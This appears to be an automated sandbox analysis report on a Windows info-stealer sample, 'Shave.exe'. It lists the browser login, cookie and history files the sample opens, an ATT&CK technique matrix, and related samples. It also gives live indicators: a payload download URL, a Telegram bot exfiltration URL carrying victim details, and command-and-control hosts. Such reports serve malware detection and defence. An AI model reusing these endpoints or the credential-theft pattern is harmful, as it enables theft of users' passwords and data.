            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\Shave.exeAPI call chain: ExitProcess graph end nodegraph_0-4365
            Source: C:\Users\user\Desktop\Shave.exeAPI call chain: ExitProcess graph end nodegraph_0-4518
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_6F971B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F971B63
            Source: C:\Users\user\Desktop\Shave.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeQueries volume information: C:\Users\user\Desktop\Shave.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
            Source: C:\Users\user\Desktop\Shave.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory215
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            3
            Obfuscated Files or Information
            Security Account Manager21
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS31
            Virtualization/Sandbox Evasion
            Distributed Component Object Model1
            Clipboard Data
            1
            Non-Standard Port
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging3
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input Capture24
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Shave.exe46%VirustotalBrowse
            Shave.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll3%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            mail.cipmach.com4%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://mail.cipmach.com0%Avira URL Cloudsafe
            http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.binQ0%Avira URL Cloudsafe
            http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin60%Avira URL Cloudsafe
            http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            mertvinc.com.tr
            185.244.144.68
            truefalse
              high
              reallyfreegeoip.org
              172.67.177.134
              truefalse
                high
                mail.cipmach.com
                199.79.63.24
                truetrueunknown
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  193.122.130.0
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.binfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://reallyfreegeoip.org/xml/8.46.123.75false
                        high
                        http://checkip.dyndns.org/false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/Shave.exe, 00000003.00000002.3299164468.0000000035322000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035313000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabShave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://mail.cipmach.comShave.exe, 00000003.00000002.3299164468.00000000352A4000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035283000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003529A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.orgShave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoShave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botShave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.office.com/lBShave.exe, 00000003.00000002.3299164468.000000003531D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20aShave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.orgShave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://nsis.sf.net/NSIS_ErrorErrorShave.exefalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=enShave.exe, 00000003.00000002.3299164468.00000000352F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.binQShave.exe, 00000003.00000002.3279604982.0000000004B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://aborters.duckdns.org:8081Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://51.38.247.67:8081/_send_.php?LShave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anotherarmy.dns.army:8081Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.75$Shave.exe, 00000003.00000002.3299164468.00000000351A8000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchShave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://chrome.google.com/webstore?hl=enlBShave.exe, 00000003.00000002.3299164468.00000000352EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://reallyfreegeoip.orgShave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameShave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin6Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://reallyfreegeoip.org/xml/Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  149.154.167.220
                                                                                  api.telegram.orgUnited Kingdom
                                                                                  62041TELEGRAMRUfalse
                                                                                  185.244.144.68
                                                                                  mertvinc.com.trTurkey
                                                                                  199608BIRBIRTRfalse
                                                                                  199.79.63.24
                                                                                  mail.cipmach.comUnited States
                                                                                  394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                  193.122.130.0
                                                                                  checkip.dyndns.comUnited States
                                                                                  31898ORACLE-BMC-31898USfalse
                                                                                  172.67.177.134
                                                                                  reallyfreegeoip.orgUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1562047
                                                                                  Start date and time:2024-11-25 07:07:07 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 23s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:5
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Shave.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/5@7/5
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 97%
                                                                                  • Number of executed functions: 207
                                                                                  • Number of non-executed functions: 113
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target Shave.exe, PID 7044 because it is empty
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  01:08:50API Interceptor114558x Sleep call for process: Shave.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  149.154.167.220PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                            18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                              SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                  sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                      185.244.144.68New listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                      • mertvinc.com.tr/TPwPATw126.bin
                                                                                                      yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
                                                                                                      WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                      • mertvinc.com.tr/fRzMqN204.bin
                                                                                                      MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                                                                                      CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                                                                                      TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                                                                                      Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
                                                                                                      Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
                                                                                                      7000091945.xlsx.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                      • mertvinc.com.tr/OGDTCbBRybqnXF193.bin
                                                                                                      199.79.63.24https://vagvn.remmipyservice.org/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=7f545595-f5d6-deb9-f7f9-d2b50e22cac0&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=638594191528303546.52bdeb30-750b-42d2-83a1-0b37c2fd3e58&state=DctBFoAgCABRrNdxSARJPI6kbVt2_Vj82U0CgD1sIVEE2iWmvZZelE1ItF6nss_lQtiUHCtPRpNRkFzazc-UpZbiPfL7jfwD&sso_reload=truGet hashmaliciousHTMLPhisherBrowse
                                                                                                        http://njcqpc.avknt.khoormann.deenampro.com./#.aHR0cHM6Ly91c2VyLmxvZ290ZWMucGUvdGFzay9hMmh2YjNKdFlXNXVRSFZ1WTI5dGJpNWpiMjA9Get hashmaliciousHTMLPhisherBrowse
                                                                                                          193.122.130.0SOA SEP 2024.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          checkip.dyndns.comNew shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          SOA SEP 2024.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          mertvinc.com.trNew listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          api.telegram.orgrorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                          • 149.154.167.220
                                                                                                          18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                          • 149.154.167.220
                                                                                                          SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          reallyfreegeoip.orgNew shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 172.67.177.134
                                                                                                          rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          SOA SEP 2024.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          BIRBIRTRNew listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
